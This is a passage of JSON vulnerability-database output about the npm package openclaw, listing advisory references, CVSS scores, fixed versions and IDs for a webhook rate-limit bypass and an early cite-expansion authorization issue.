"cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35646", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35646" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation" }, { "reference_url": "https://github.com/advisories/GHSA-59xc-5v89-r7pr", "reference_id": "GHSA-59xc-5v89-r7pr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-59xc-5v89-r7pr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "GHSA-59xc-5v89-r7pr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-r9y1-z2ax-z3e2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89843?format=api", "vulnerability_id": "VCID-rf6b-q7cj-jbgc", "summary": "Duplicate Advisory: OpenClaw: Tlon cite expansion happens before channel and DM authorization is complete\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-vfg3-pqpq-93m4. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 performs cite expansion before completing channel and DM authorization checks, allowing cite work and content handling prior to final auth decisions. Attackers can exploit this timing vulnerability to access or manipulate content before proper authorization validation occurs.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35637", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35637" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm" }, { "reference_url": "https://github.com/advisories/GHSA-p6j4-wvmc-vx2h", "reference_id": "GHSA-p6j4-wvmc-vx2h", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p6j4-wvmc-vx2h" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, 